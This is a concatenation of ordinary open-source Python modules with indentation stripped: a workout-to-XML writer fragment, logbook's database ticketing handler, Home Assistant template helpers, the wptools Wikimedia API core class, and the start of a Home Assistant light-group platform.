if altStat.Loss is not None:
etree.SubElement(xsummary, "descendingelevation").text = str(altStat.Loss)
_writeSummaryData(xworkout, activity, time_ref=activity.StartTime)
for lap in activity.Laps:
xsegment = etree.SubElement(xworkout, "segment")
_writeSummaryData(xsegment, lap, time_ref=activity.StartTime)
for wp in activity.GetFlatWaypoints():
xsample = etree.SubElement(xworkout, "sample")
etree.SubElement(xsample, "timeoffset").text = str((wp.Timestamp - activity.StartTime).total_seconds())
if wp.HR is not None:
etree.SubElement(xsample, "hr").text = str(round(wp.HR))
if wp.Speed is not None:
etree.SubElement(xsample, "spd").text = str(wp.Speed)
if wp.Power is not None:
etree.SubElement(xsample, "pwr").text = str(round(wp.Power))
if wp.Cadence is not None:
etree.SubElement(xsample, "cad").text = str(round(wp.Cadence))
else:
if wp.RunCadence is not None:
etree.SubElement(xsample, "cad").text = str(round(wp.RunCadence))
if wp.Distance is not None:
etree.SubElement(xsample, "dist").text = str(wp.Distance)
if wp.Location is not None:
if wp.Location.Longitude is not None:
etree.SubElement(xsample, "lat").text = str(wp.Location.Latitude)
etree.SubElement(xsample, "lon").text = str(wp.Location.Longitude)
if wp.Location.Altitude is not None:
etree.SubElement(xsample, "alt").text = str(wp.Location.Altitude)
if wp.Temp is not None:
etree.SubElement(xsample, "temp").text = str(wp.Temp)
return etree.tostring(xroot, pretty_print=True, xml_declaration=True, encoding="UTF-8").decode("UTF-8")
| |
# -*- coding: utf-8 -*-
"""
logbook.ticketing
~~~~~~~~~~~~~~~~~
Implements long handlers that write to remote data stores and assign
each logging message a ticket id.
:copyright: (c) 2010 by Armin Ronacher, Georg Brandl.
:license: BSD, see LICENSE for more details.
"""
from time import time
import json
from logbook.base import NOTSET, level_name_property, LogRecord
from logbook.handlers import Handler, HashingHandlerMixin
from logbook.helpers import cached_property, b, PY2, u
from sqlalchemy.orm import sessionmaker, scoped_session
class Ticket(object):
"""Represents a ticket from the database."""
level_name = level_name_property()
def __init__(self, db, row):
self.db = db
self.__dict__.update(row)
@cached_property
def last_occurrence(self):
"""The last occurrence."""
rv = self.get_occurrences(limit=1)
if rv:
return rv[0]
def get_occurrences(self, order_by='-time', limit=50, offset=0):
"""Returns the occurrences for this ticket."""
return self.db.get_occurrences(self.ticket_id, order_by, limit, offset)
def solve(self):
"""Marks this ticket as solved."""
self.db.solve_ticket(self.ticket_id)
self.solved = True
def delete(self):
"""Deletes the ticket from the database."""
self.db.delete_ticket(self.ticket_id)
# Silence DeprecationWarning
__hash__ = None
def __eq__(self, other):
equal = True
for key in self.__dict__.keys():
if getattr(self, key) != getattr(other, key):
equal = False
break
return equal
def __ne__(self, other):
return not self.__eq__(other)
class Occurrence(LogRecord):
"""Represents an occurrence of a ticket."""
def __init__(self, db, row):
self.update_from_dict(json.loads(row['data']))
self.db = db
self.time = row['time']
self.ticket_id = row['ticket_id']
self.occurrence_id = row['occurrence_id']
class BackendBase(object):
"""Provides an abstract interface to various databases."""
def __init__(self, **options):
self.options = options
self.setup_backend()
def setup_backend(self):
"""Setup the database backend."""
raise NotImplementedError()
def record_ticket(self, record, data, hash, app_id):
"""Records a log record as ticket."""
raise NotImplementedError()
def count_tickets(self):
"""Returns the number of tickets."""
raise NotImplementedError()
def get_tickets(self, order_by='-last_occurrence_time', limit=50, offset=0):
"""Selects tickets from the database."""
raise NotImplementedError()
def solve_ticket(self, ticket_id):
"""Marks a ticket as solved."""
raise NotImplementedError()
def delete_ticket(self, ticket_id):
"""Deletes a ticket from the database."""
raise NotImplementedError()
def get_ticket(self, ticket_id):
"""Return a single ticket with all occurrences."""
raise NotImplementedError()
def get_occurrences(self, ticket, order_by='-time', limit=50, offset=0):
"""Selects occurrences from the database for a ticket."""
raise NotImplementedError()
class SQLAlchemyBackend(BackendBase):
"""Implements a backend that is writing into a database SQLAlchemy can
interface.
This backend takes some additional options:
`table_prefix`
an optional table prefix for all tables created by
the logbook ticketing handler.
`metadata`
an optional SQLAlchemy metadata object for the table creation.
`autocreate_tables`
can be set to `False` to disable the automatic
creation of the logbook tables.
"""
def setup_backend(self):
from sqlalchemy import create_engine, MetaData
engine_or_uri = self.options.pop('uri', None)
metadata = self.options.pop('metadata', None)
table_prefix = self.options.pop('table_prefix', 'logbook_')
if hasattr(engine_or_uri, 'execute'):
self.engine = engine_or_uri
else:
# Pool recycle keeps connections from going stale, which happens in MySQL Databases
# Pool size is more custom for out stack
self.engine = create_engine(engine_or_uri, convert_unicode=True, pool_recycle=360, pool_size=1000)
# Create session factory using session maker
session = sessionmaker()
# Bind to the engined
session.configure(bind=self.engine)
# Scoped session is a thread safe solution for
# interaction with the Database
self.session = scoped_session(session)
if metadata is None:
metadata = MetaData()
self.table_prefix = table_prefix
self.metadata = metadata
self.create_tables()
if self.options.get('autocreate_tables', True):
self.metadata.create_all(bind=self.engine)
def create_tables(self):
"""Creates the tables required for the handler on the class and
metadata.
"""
import sqlalchemy as db
def table(name, *args, **kwargs):
return db.Table(self.table_prefix + name, self.metadata,
*args, **kwargs)
self.tickets = table('tickets',
db.Column('ticket_id', db.Integer, primary_key=True),
db.Column('record_hash', db.String(40), unique=True),
db.Column('level', db.Integer),
db.Column('channel', db.String(120)),
db.Column('location', db.String(512)),
db.Column('module', db.String(256)),
db.Column('last_occurrence_time', db.DateTime),
db.Column('occurrence_count', db.Integer),
db.Column('solved', db.Boolean),
db.Column('app_id', db.String(80))
)
self.occurrences = table('occurrences',
db.Column('occurrence_id', db.Integer, primary_key=True),
db.Column('ticket_id', db.Integer,
db.ForeignKey(self.table_prefix + 'tickets.ticket_id')),
db.Column('time', db.DateTime),
db.Column('data', db.Text),
db.Column('app_id', db.String(80))
)
def _order(self, q, table, order_by):
if order_by[0] == '-':
return q.order_by(table.c[order_by[1:]].desc())
return q.order_by(table.c[order_by])
def record_ticket(self, record, data, hash, app_id):
"""Records a log record as ticket."""
# Can use the session instead engine.connection and transaction
s = self.session
try:
q = self.tickets.select(self.tickets.c.record_hash == hash)
row = s.execute(q).fetchone()
if row is None:
row = s.execute(self.tickets.insert().values(
record_hash=hash,
level=record.level,
channel=record.channel or u(''),
location=u('%s:%d') % (record.filename, record.lineno),
module=record.module or u('<unknown>'),
occurrence_count=0,
solved=False,
app_id=app_id
))
ticket_id = row.inserted_primary_key[0]
else:
ticket_id = row['ticket_id']
s.execute(self.occurrences.insert()
.values(ticket_id=ticket_id,
time=record.time,
app_id=app_id,
data=json.dumps(data)))
s.execute(self.tickets.update()
.where(self.tickets.c.ticket_id == ticket_id)
.values(occurrence_count=self.tickets.c.occurrence_count + 1,
last_occurrence_time=record.time,
solved=False))
s.commit()
except Exception:
s.rollback()
raise
# Closes the session and removes it from the pool
s.remove()
def count_tickets(self):
"""Returns the number of tickets."""
return self.engine.execute(self.tickets.count()).fetchone()[0]
def get_tickets(self, order_by='-last_occurrence_time', limit=50, offset=0):
"""Selects tickets from the database."""
return [Ticket(self, row) for row in self.engine.execute(
self._order(self.tickets.select(), self.tickets, order_by)
.limit(limit).offset(offset)).fetchall()]
def solve_ticket(self, ticket_id):
"""Marks a ticket as solved."""
self.engine.execute(self.tickets.update()
.where(self.tickets.c.ticket_id == ticket_id)
.values(solved=True))
def delete_ticket(self, ticket_id):
"""Deletes a ticket from the database."""
self.engine.execute(self.occurrences.delete()
.where(self.occurrences.c.ticket_id == ticket_id))
self.engine.execute(self.tickets.delete()
.where(self.tickets.c.ticket_id == ticket_id))
def get_ticket(self, ticket_id):
"""Return a single ticket with all occurrences."""
row = self.engine.execute(self.tickets.select().where(
self.tickets.c.ticket_id == ticket_id)).fetchone()
if row is not None:
return Ticket(self, row)
def get_occurrences(self, ticket, order_by='-time', limit=50, offset=0):
"""Selects occurrences from the database for a ticket."""
return [Occurrence(self, row) for row in
self.engine.execute(self._order(self.occurrences.select()
.where(self.occurrences.c.ticket_id == ticket),
self.occurrences, order_by)
.limit(limit).offset(offset)).fetchall()]
class MongoDBBackend(BackendBase):
"""Implements a backend that writes into a MongoDB database."""
class _FixedTicketClass(Ticket):
@property
def ticket_id(self):
return self._id
class _FixedOccurrenceClass(Occurrence):
def __init__(self, db, row):
self.update_from_dict(json.loads(row['data']))
self.db = db
self.time = row['time']
self.ticket_id = row['ticket_id']
self.occurrence_id = row['_id']
#TODO: Update connection setup once PYTHON-160 is solved.
def setup_backend(self):
import pymongo
from pymongo import ASCENDING, DESCENDING
from pymongo.connection import Connection
try:
from pymongo.uri_parser import parse_uri
except ImportError:
from pymongo.connection import _parse_uri as parse_uri
from pymongo.errors import AutoReconnect
_connection = None
uri = self.options.pop('uri', u(''))
_connection_attempts = 0
parsed_uri = parse_uri(uri, Connection.PORT)
if type(parsed_uri) is tuple:
# pymongo < 2.0
database = parsed_uri[1]
else:
# pymongo >= 2.0
database = parsed_uri['database']
# Handle auto reconnect signals properly
while _connection_attempts < 5:
try:
if _connection is None:
_connection = Connection(uri)
database = _connection[database]
break
except AutoReconnect:
_connection_attempts += 1
time.sleep(0.1)
self.database = database
# setup correct indexes
database.tickets.ensure_index([('record_hash', ASCENDING)], unique=True)
database.tickets.ensure_index([('solved', ASCENDING), ('level', ASCENDING)])
database.occurrences.ensure_index([('time', DESCENDING)])
def _order(self, q, order_by):
from pymongo import ASCENDING, DESCENDING
col = '%s' % (order_by[0] == '-' and order_by[1:] or order_by)
if order_by[0] == '-':
return q.sort(col, DESCENDING)
return q.sort(col, ASCENDING)
def _oid(self, ticket_id):
from pymongo.objectid import ObjectId
return ObjectId(ticket_id)
def record_ticket(self, record, data, hash, app_id):
"""Records a log record as ticket."""
db = self.database
ticket = db.tickets.find_one({'record_hash': hash})
if not ticket:
doc = {
'record_hash': hash,
'level': record.level,
'channel': record.channel or u(''),
'location': u('%s:%d') % (record.filename, record.lineno),
'module': record.module or u('<unknown>'),
'occurrence_count': 0,
'solved': False,
'app_id': app_id,
}
ticket_id = db.tickets.insert(doc)
else:
ticket_id = ticket['_id']
db.tickets.update({'_id': ticket_id}, {
'$inc': {
'occurrence_count': 1
},
'$set': {
'last_occurrence_time': record.time,
'solved': False
}
})
# We store occurrences in a seperate collection so that
# we can make it a capped collection optionally.
db.occurrences.insert({
'ticket_id': self._oid(ticket_id),
'app_id': app_id,
'time': record.time,
'data': json.dumps(data),
})
def count_tickets(self):
"""Returns the number of tickets."""
return self.database.tickets.count()
def get_tickets(self, order_by='-last_occurrence_time', limit=50, offset=0):
"""Selects tickets from the database."""
query = self._order(self.database.tickets.find(), order_by) \
.limit(limit).skip(offset)
return [self._FixedTicketClass(self, obj) for obj in query]
def solve_ticket(self, ticket_id):
"""Marks a ticket as solved."""
self.database.tickets.update({'_id': self._oid(ticket_id)},
{'solved': True})
def delete_ticket(self, ticket_id):
"""Deletes a ticket from the database."""
self.database.occurrences.remove({'ticket_id': self._oid(ticket_id)})
self.database.tickets.remove({'_id': self._oid(ticket_id)})
def get_ticket(self, ticket_id):
"""Return a single ticket with all occurrences."""
ticket = self.database.tickets.find_one({'_id': self._oid(ticket_id)})
if ticket:
return Ticket(self, ticket)
def get_occurrences(self, ticket, order_by='-time', limit=50, offset=0):
"""Selects occurrences from the database for a ticket."""
collection = self.database.occurrences
occurrences = self._order(collection.find(
{'ticket_id': self._oid(ticket)}
), order_by).limit(limit).skip(offset)
return [self._FixedOccurrenceClass(self, obj) for obj in occurrences]
class TicketingBaseHandler(Handler, HashingHandlerMixin):
"""Baseclass for ticketing handlers. This can be used to interface
ticketing systems that do not necessarily provide an interface that
would be compatible with the :class:`BackendBase` interface.
"""
def __init__(self, hash_salt, level=NOTSET, filter=None, bubble=False):
Handler.__init__(self, level, filter, bubble)
self.hash_salt = hash_salt
def hash_record_raw(self, record):
"""Returns the unique hash of a record."""
hash = HashingHandlerMixin.hash_record_raw(self, record)
if self.hash_salt is not None:
hash_salt = self.hash_salt
if not PY2 or isinstance(hash_salt, unicode):
hash_salt = hash_salt.encode('utf-8')
hash.update(b('\x00') + hash_salt)
return hash
class TicketingHandler(TicketingBaseHandler):
"""A handler that writes log records into a remote database. This
database can be connected to from different dispatchers which makes
this a nice setup for web applications::
from logbook.ticketing import TicketingHandler
handler = TicketingHandler('sqlite:////tmp/myapp-logs.db')
:param uri: a backend specific string or object to decide where to log to.
:param app_id: a string with an optional ID for an application. Can be
used to keep multiple application setups apart when logging
into the same database.
:param hash_salt: an optional salt (binary string) for the hashes.
:param backend: A backend class that implements the proper database handling.
Backends available are: :class:`SQLAlchemyBackend`,
:class:`MongoDBBackend`.
"""
#: The default backend that is being used when no backend is specified.
#: Unless overriden by a subclass this will be the
#: :class:`SQLAlchemyBackend`.
default_backend = SQLAlchemyBackend
def __init__(self, uri, app_id='generic', level=NOTSET,
filter=None, bubble=False, hash_salt=None, backend=None,
**db_options):
if hash_salt is None:
hash_salt = u('apphash-') + app_id
TicketingBaseHandler.__init__(self, hash_salt, level, filter, bubble)
if backend is None:
backend = self.default_backend
db_options['uri'] = uri
self.set_backend(backend, **db_options)
self.app_id = app_id
def set_backend(self, cls, **options):
self.db = cls(**options)
def process_record(self, record, hash):
"""Subclasses can override this to tamper with the data dict that
is sent to the database as JSON.
"""
return record.to_dict(json_safe=True)
def record_ticket(self, record, data, hash):
"""Record either a new ticket or a new occurrence for a
ticket based on the hash.
"""
self.db.record_ticket(record, data, hash, self.app_id)
def emit(self, record):
"""Emits a single record and writes it to the database."""
hash = self.hash_record(record)
data = self.process_record(record, hash)
self.record_ticket(record, data, hash)
| |
"""Template helper methods for rendering strings with HA data."""
from datetime import datetime
import json
import logging
import re
import jinja2
from jinja2.sandbox import ImmutableSandboxedEnvironment
from homeassistant.const import (
STATE_UNKNOWN, ATTR_LATITUDE, ATTR_LONGITUDE, MATCH_ALL)
from homeassistant.core import State
from homeassistant.exceptions import TemplateError
from homeassistant.helpers import location as loc_helper
from homeassistant.loader import get_component
from homeassistant.util import convert, dt as dt_util, location as loc_util
from homeassistant.util.async import run_callback_threadsafe
_LOGGER = logging.getLogger(__name__)
_SENTINEL = object()
DATE_STR_FORMAT = "%Y-%m-%d %H:%M:%S"
_RE_NONE_ENTITIES = re.compile(r"distance\(|closest\(", re.I | re.M)
_RE_GET_ENTITIES = re.compile(
r"(?:(?:states\.|(?:is_state|is_state_attr|states)\(.)([\w]+\.[\w]+))",
re.I | re.M
)
def attach(hass, obj):
"""Recursively attach hass to all template instances in list and dict."""
if isinstance(obj, list):
for child in obj:
attach(hass, child)
elif isinstance(obj, dict):
for child in obj.values():
attach(hass, child)
elif isinstance(obj, Template):
obj.hass = hass
def extract_entities(template):
"""Extract all entities for state_changed listener from template string."""
if template is None or _RE_NONE_ENTITIES.search(template):
return MATCH_ALL
extraction = _RE_GET_ENTITIES.findall(template)
if len(extraction) > 0:
return list(set(extraction))
return MATCH_ALL
class Template(object):
"""Class to hold a template and manage caching and rendering."""
def __init__(self, template, hass=None):
"""Instantiate a Template."""
if not isinstance(template, str):
raise TypeError('Expected template to be a string')
self.template = template
self._compiled_code = None
self._compiled = None
self.hass = hass
def ensure_valid(self):
"""Return if template is valid."""
if self._compiled_code is not None:
return
try:
self._compiled_code = ENV.compile(self.template)
except jinja2.exceptions.TemplateSyntaxError as err:
raise TemplateError(err)
def extract_entities(self):
"""Extract all entities for state_changed listener."""
return extract_entities(self.template)
def render(self, variables=None, **kwargs):
"""Render given template."""
if variables is not None:
kwargs.update(variables)
return run_callback_threadsafe(
self.hass.loop, self.async_render, kwargs).result()
def async_render(self, variables=None, **kwargs):
"""Render given template.
This method must be run in the event loop.
"""
self._ensure_compiled()
if variables is not None:
kwargs.update(variables)
try:
return self._compiled.render(kwargs).strip()
except jinja2.TemplateError as err:
raise TemplateError(err)
def render_with_possible_json_value(self, value, error_value=_SENTINEL):
"""Render template with value exposed.
If valid JSON will expose value_json too.
"""
return run_callback_threadsafe(
self.hass.loop, self.async_render_with_possible_json_value, value,
error_value).result()
# pylint: disable=invalid-name
def async_render_with_possible_json_value(self, value,
error_value=_SENTINEL):
"""Render template with value exposed.
If valid JSON will expose value_json too.
This method must be run in the event loop.
"""
self._ensure_compiled()
variables = {
'value': value
}
try:
variables['value_json'] = json.loads(value)
except ValueError:
pass
try:
return self._compiled.render(variables).strip()
except jinja2.TemplateError as ex:
_LOGGER.error('Error parsing value: %s (value: %s, template: %s)',
ex, value, self.template)
return value if error_value is _SENTINEL else error_value
def _ensure_compiled(self):
"""Bind a template to a specific hass instance."""
if self._compiled is not None:
return
self.ensure_valid()
assert self.hass is not None, 'hass variable not set on template'
location_methods = LocationMethods(self.hass)
global_vars = ENV.make_globals({
'closest': location_methods.closest,
'distance': location_methods.distance,
'is_state': self.hass.states.is_state,
'is_state_attr': self.hass.states.is_state_attr,
'states': AllStates(self.hass),
})
self._compiled = jinja2.Template.from_code(
ENV, self._compiled_code, global_vars, None)
return self._compiled
def __eq__(self, other):
"""Compare template with another."""
return (self.__class__ == other.__class__ and
self.template == other.template and
self.hass == other.hass)
class AllStates(object):
"""Class to expose all HA states as attributes."""
def __init__(self, hass):
"""Initialize all states."""
self._hass = hass
def __getattr__(self, name):
"""Return the domain state."""
return DomainStates(self._hass, name)
def __iter__(self):
"""Return all states."""
return iter(sorted(self._hass.states.async_all(),
key=lambda state: state.entity_id))
def __call__(self, entity_id):
"""Return the states."""
state = self._hass.states.get(entity_id)
return STATE_UNKNOWN if state is None else state.state
class DomainStates(object):
"""Class to expose a specific HA domain as attributes."""
def __init__(self, hass, domain):
"""Initialize the domain states."""
self._hass = hass
self._domain = domain
def __getattr__(self, name):
"""Return the states."""
return self._hass.states.get('{}.{}'.format(self._domain, name))
def __iter__(self):
"""Return the iteration over all the states."""
return iter(sorted(
(state for state in self._hass.states.async_all()
if state.domain == self._domain),
key=lambda state: state.entity_id))
class LocationMethods(object):
"""Class to expose distance helpers to templates."""
def __init__(self, hass):
"""Initialize the distance helpers."""
self._hass = hass
def closest(self, *args):
"""Find closest entity.
Closest to home:
closest(states)
closest(states.device_tracker)
closest('group.children')
closest(states.group.children)
Closest to a point:
closest(23.456, 23.456, 'group.children')
closest('zone.school', 'group.children')
closest(states.zone.school, 'group.children')
"""
if len(args) == 1:
latitude = self._hass.config.latitude
longitude = self._hass.config.longitude
entities = args[0]
elif len(args) == 2:
point_state = self._resolve_state(args[0])
if point_state is None:
_LOGGER.warning('Closest:Unable to find state %s', args[0])
return None
elif not loc_helper.has_location(point_state):
_LOGGER.warning(
'Closest:State does not contain valid location: %s',
point_state)
return None
latitude = point_state.attributes.get(ATTR_LATITUDE)
longitude = point_state.attributes.get(ATTR_LONGITUDE)
entities = args[1]
else:
latitude = convert(args[0], float)
longitude = convert(args[1], float)
if latitude is None or longitude is None:
_LOGGER.warning(
'Closest:Received invalid coordinates: %s, %s',
args[0], args[1])
return None
entities = args[2]
if isinstance(entities, (AllStates, DomainStates)):
states = list(entities)
else:
if isinstance(entities, State):
gr_entity_id = entities.entity_id
else:
gr_entity_id = str(entities)
group = get_component('group')
states = [self._hass.states.get(entity_id) for entity_id
in group.expand_entity_ids(self._hass, [gr_entity_id])]
return loc_helper.closest(latitude, longitude, states)
def distance(self, *args):
"""Calculate distance.
Will calculate distance from home to a point or between points.
Points can be passed in using state objects or lat/lng coordinates.
"""
locations = []
to_process = list(args)
while to_process:
value = to_process.pop(0)
if isinstance(value, State):
latitude = value.attributes.get(ATTR_LATITUDE)
longitude = value.attributes.get(ATTR_LONGITUDE)
if latitude is None or longitude is None:
_LOGGER.warning(
'Distance:State does not contains a location: %s',
value)
return None
else:
# We expect this and next value to be lat&lng
if not to_process:
_LOGGER.warning(
'Distance:Expected latitude and longitude, got %s',
value)
return None
value_2 = to_process.pop(0)
latitude = convert(value, float)
longitude = convert(value_2, float)
if latitude is None or longitude is None:
_LOGGER.warning('Distance:Unable to process latitude and '
'longitude: %s, %s', value, value_2)
return None
locations.append((latitude, longitude))
if len(locations) == 1:
return self._hass.config.distance(*locations[0])
return self._hass.config.units.length(
loc_util.distance(*locations[0] + locations[1]), 'm')
def _resolve_state(self, entity_id_or_state):
"""Return state or entity_id if given."""
if isinstance(entity_id_or_state, State):
return entity_id_or_state
elif isinstance(entity_id_or_state, str):
return self._hass.states.get(entity_id_or_state)
return None
def forgiving_round(value, precision=0):
"""Rounding filter that accepts strings."""
try:
value = round(float(value), precision)
return int(value) if precision == 0 else value
except (ValueError, TypeError):
# If value can't be converted to float
return value
def multiply(value, amount):
"""Filter to convert value to float and multiply it."""
try:
return float(value) * amount
except (ValueError, TypeError):
# If value can't be converted to float
return value
def timestamp_custom(value, date_format=DATE_STR_FORMAT, local=True):
"""Filter to convert given timestamp to format."""
try:
date = dt_util.utc_from_timestamp(value)
if local:
date = dt_util.as_local(date)
return date.strftime(date_format)
except (ValueError, TypeError):
# If timestamp can't be converted
return value
def timestamp_local(value):
"""Filter to convert given timestamp to local date/time."""
try:
return dt_util.as_local(
dt_util.utc_from_timestamp(value)).strftime(DATE_STR_FORMAT)
except (ValueError, TypeError):
# If timestamp can't be converted
return value
def timestamp_utc(value):
"""Filter to convert given timestamp to UTC date/time."""
try:
return dt_util.utc_from_timestamp(value).strftime(DATE_STR_FORMAT)
except (ValueError, TypeError):
# If timestamp can't be converted
return value
def strptime(string, fmt):
"""Parse a time string to datetime."""
try:
return datetime.strptime(string, fmt)
except (ValueError, AttributeError):
return string
def fail_when_undefined(value):
"""Filter to force a failure when the value is undefined."""
if isinstance(value, jinja2.Undefined):
value()
return value
def forgiving_float(value):
"""Try to convert value to a float."""
try:
return float(value)
except (ValueError, TypeError):
return value
class TemplateEnvironment(ImmutableSandboxedEnvironment):
"""The Home Assistant template environment."""
def is_safe_callable(self, obj):
"""Test if callback is safe."""
return isinstance(obj, AllStates) or super().is_safe_callable(obj)
ENV = TemplateEnvironment()
ENV.filters['round'] = forgiving_round
ENV.filters['multiply'] = multiply
ENV.filters['timestamp_custom'] = timestamp_custom
ENV.filters['timestamp_local'] = timestamp_local
ENV.filters['timestamp_utc'] = timestamp_utc
ENV.filters['is_defined'] = fail_when_undefined
ENV.filters['max'] = max
ENV.filters['min'] = min
ENV.globals['float'] = forgiving_float
ENV.globals['now'] = dt_util.now
ENV.globals['utcnow'] = dt_util.utcnow
ENV.globals['as_timestamp'] = dt_util.as_timestamp
ENV.globals['relative_time'] = dt_util.get_age
ENV.globals['strptime'] = strptime
| |
# -*- coding:utf-8 -*-
"""
WPTools core module
~~~~~~~~~~~~~~~~~~~
Support for accessing Wikimedia foundation APIs.
"""
from time import sleep
import urllib.parse
from wptools.query import WPToolsQuery
from . import utils
import requests
class WPTools(object):
"""
WPtools (abstract) core class
"""
REQUEST_DELAY = 0
REQUEST_LIMIT = 50
cache = None
data = None
flags = None
params = None
def __init__(self, *args, **kwargs):
"""
Abstract initialization for...
- wptools.page
- wptools.category
- wptools.restbase
- wptools.wikidata
"""
self.cache = {}
self.data = {}
self.flags = {
'silent': kwargs.get('silent') or False,
'verbose': kwargs.get('verbose') or False
}
self.params = {
'lang': kwargs.get('lang') or 'en',
}
if len(args) > 0 and args[0]: # first positional arg is title
self.params.update({'title': args[0]})
if kwargs.get('skip'):
self.flags.update({'skip': kwargs.get('skip')})
if kwargs.get('variant'):
self.params.update({'variant': kwargs.get('variant')})
if kwargs.get('wiki'):
self.params.update({'wiki': kwargs.get('wiki')})
def _build_showstr(self, seed):
"""
Returns show() display string for data attribute
"""
output = ["%s (%s) data" % (seed, self.params['lang'])]
output.append('{')
maxwidth = WPToolsQuery.MAXWIDTH
for item in sorted(self.data):
if self.data[item] is None:
continue
prefix = item
value = self.data[item]
if isinstance(value, dict):
prefix = "%s: <dict(%d)>" % (prefix, len(value))
value = ', '.join(value.keys())
elif isinstance(value, int):
prefix = "%s:" % prefix
if 'pageid' not in prefix:
value = "{:,}".format(value)
elif isinstance(value, list):
prefix = "%s: <list(%d)>" % (prefix, len(value))
value = ', '.join((safestr(x) for x in value if x))
elif isinstance(value, tuple):
prefix = "%s: <tuple(%d)>" % (prefix, len(value))
value = ', '.join((safestr(x) for x in value if x))
elif utils.is_text(value):
value = value.strip().replace('\n', '')
if len(value) > (maxwidth - len(prefix)):
prefix = "%s: <str(%d)>" % (prefix, len(value))
else:
prefix = "%s:" % prefix
output.append(" %s %s" % (prefix, value))
output.append('}')
return output
def _continue_params(self):
"""
Returns query string fragment continue parameters
"""
if not self.data.get('continue'):
return
params = []
for item in self.data['continue']:
params.append("&%s=%s" % (item, urllib.parse.quote_plus(self.data['continue'][item])))
return ''.join(params)
def _handle_continuations(self, response, cache_key):
"""
Select continue params and clear cache or last continue params
"""
rcontinue = response.get('continue')
listen = ['blcontinue', 'cmcontinue', 'plcontinue']
cparams = {}
if rcontinue:
for flag in listen:
if rcontinue.get(flag):
cparams[flag] = rcontinue.get(flag)
if cparams:
self.data['continue'] = cparams
del self.cache[cache_key]
else: # no more continuations
if 'continue' in self.data:
del self.data['continue']
def _get(self, action, show, proxy, timeout):
"""
make HTTP request and cache response
"""
silent = self.flags['silent']
if action in self.cache:
if action != 'imageinfo' and action != 'labels':
utils.stderr("+ %s results in cache" % action, silent)
return
else:
self.cache[action] = {}
if self.flags.get('skip') and action in self.flags['skip']:
if not self.flags['silent']:
utils.stderr("+ skipping %s" % action)
return
if 'requests' not in self.data:
self.data['requests'] = []
if len(self.data['requests']) >= self.REQUEST_LIMIT:
raise StopIteration("Hit REQUEST_LIMIT = %d" % self.REQUEST_LIMIT)
if self.data['requests'] and self.REQUEST_DELAY:
utils.stderr("REQUEST_DELAY = %d seconds" % self.REQUEST_DELAY)
sleep(self.REQUEST_DELAY)
# make the request
qobj = WPToolsQuery(lang=self.params['lang'],
variant=self.params.get('variant'),
wiki=self.params.get('wiki'),
endpoint=self.params.get('endpoint'))
qstr = self._query(action, qobj)
response = requests.get(qstr, qobj.status)
self.cache[action]['query'] = qstr
self.cache[action]['response'] = response.json()
self.data['requests'].append(action)
self._set_data(action)
if show and not self.flags.get('silent'):
self.show()
def _load_response(self, action):
"""
returns API reponse from cache or raises ValueError
"""
_query = self.cache[action]['query'].replace('&format=json', '')
response = self.cache[action]['response']
if not response:
raise ValueError("Empty response: %s" % self.params)
data = response
if data.get('warnings'):
if 'WARNINGS' in self.data:
self.data['WARNINGS'].update(data['warnings'])
else:
self.data['WARNINGS'] = data['warnings']
if data.get('error'):
utils.stderr("API error: %s" % data.get('error'))
raise LookupError(_query)
if 'query' in action and data.get('query'):
if data['query'].get('pages'):
if data['query']['pages'][0].get('missing'):
raise LookupError(_query)
if action == 'parse' and not data.get('parse'):
raise LookupError(_query)
if action == 'wikidata':
handle_wikidata_errors(data, _query)
return data
def _query(self, action, qobj):
"""
Abstract method that returns WPToolsQuery string
"""
raise NotImplementedError("A subclass must implement this method.")
def _set_data(self, action):
"""
Abstract method to capture API response data
"""
raise NotImplementedError("A subclass must implement this method.")
def info(self, action=None):
"""
returns cached request info for given action,
or list of cached actions
"""
if action in self.cache:
return self.cache[action]['info']
return self.cache.keys() or None
def query(self, action=None):
"""
returns cached query string (without &format=json) for given action,
or list of cached actions
"""
if action in self.cache:
return self.cache[action]['query'].replace('&format=json', '')
return self.cache.keys() or None
def response(self, action=None):
"""
returns cached response (as dict) for given action,
or list of cached actions
"""
if action in self.cache:
return self.cache[action]['response']
return self.cache.keys() or None
def show(self):
"""
Pretty-print instance data
"""
if not self.data:
return
if self.data.get('continue'):
return
ptitle = self.params.get('title')
dtitle = self.data.get('title')
pageid = self.params.get('pageid')
seed = dtitle or ptitle or pageid
if utils.is_text(seed):
seed = seed.replace('_', ' ')
prettyprint(self._build_showstr(seed))
def handle_wikidata_errors(data, query):
"""
Raises LookupError if wikidata error found
"""
entities = data.get('entities')
if not entities:
raise LookupError(query)
elif '-1' in entities:
raise LookupError(query)
else:
item = list(entities.values())[0]
if 'missing' in item:
errmsg = "wikidata item %s has been deleted" % item['id']
raise LookupError(errmsg)
def prettyprint(datastr):
"""
Print page data strings to stderr
"""
maxwidth = WPToolsQuery.MAXWIDTH
rpad = WPToolsQuery.RPAD
extent = maxwidth - (rpad + 2)
for line in datastr:
if len(line) >= maxwidth:
line = line[:extent] + '...'
utils.stderr(line)
def safestr(text):
"""
Safely convert unicode to a string
"""
if text is None:
return
try:
return str(text)
except UnicodeEncodeError:
return str(text.encode('utf-8'))
| |
"""This platform allows several lights to be grouped into one light."""
import asyncio
from collections import Counter
import itertools
import logging
from typing import Any, Callable, Iterator, List, Optional, Tuple, cast
import voluptuous as vol
from homeassistant.components import light
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_EFFECT_LIST,
ATTR_FLASH,
ATTR_HS_COLOR,
ATTR_MAX_MIREDS,
ATTR_MIN_MIREDS,
ATTR_TRANSITION,
ATTR_WHITE_VALUE,
PLATFORM_SCHEMA,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_FLASH,
SUPPORT_TRANSITION,
SUPPORT_WHITE_VALUE,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_SUPPORTED_FEATURES,
CONF_ENTITIES,
CONF_NAME,
STATE_ON,
STATE_UNAVAILABLE,
)
from homeassistant.core import CALLBACK_TYPE, State, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.event import async_track_state_change
from homeassistant.helpers.typing import ConfigType, HomeAssistantType
from homeassistant.util import color as color_util
# mypy: allow-incomplete-defs, allow-untyped-calls, allow-untyped-defs
# mypy: no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "Light Group"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
